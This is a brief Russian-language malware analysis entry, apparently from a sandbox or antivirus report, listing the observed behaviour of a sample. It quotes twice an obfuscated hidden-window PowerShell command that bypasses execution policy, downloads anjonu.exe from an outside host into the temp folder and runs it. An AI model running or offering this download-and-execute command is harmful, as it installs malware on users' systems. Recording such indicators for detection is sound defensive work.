Техническая информация
- http://mag9.us/anjonu.exe как %temp%\\data.exe
- '<SYSTEM32>\cmd.exe' cmD.exE /C poWeRshElL.EXE -wIndowStYlE HiDDEn -NOPROFilE -exEcUtiONPoLicY ByPaSs (NEw-ObjEct SyStem.NeT.WeBCliEnT).DowNLoAdFile('http://mag9.us/anjonu.exe','%TEMP%\\data.exe') & %TEMP%\\data.ex...
- DNS ASK ma#9.us
- '<SYSTEM32>\cmd.exe' cmD.exE /C poWeRshElL.EXE -wIndowStYlE HiDDEn -NOPROFilE -exEcUtiONPoLicY ByPaSs (NEw-ObjEct SyStem.NeT.WeBCliEnT).DowNLoAdFile('http://mag9.us/anjonu.exe','%TEMP%\\data.exe') & %TEMP%\\data.ex...' (со скрытым окном)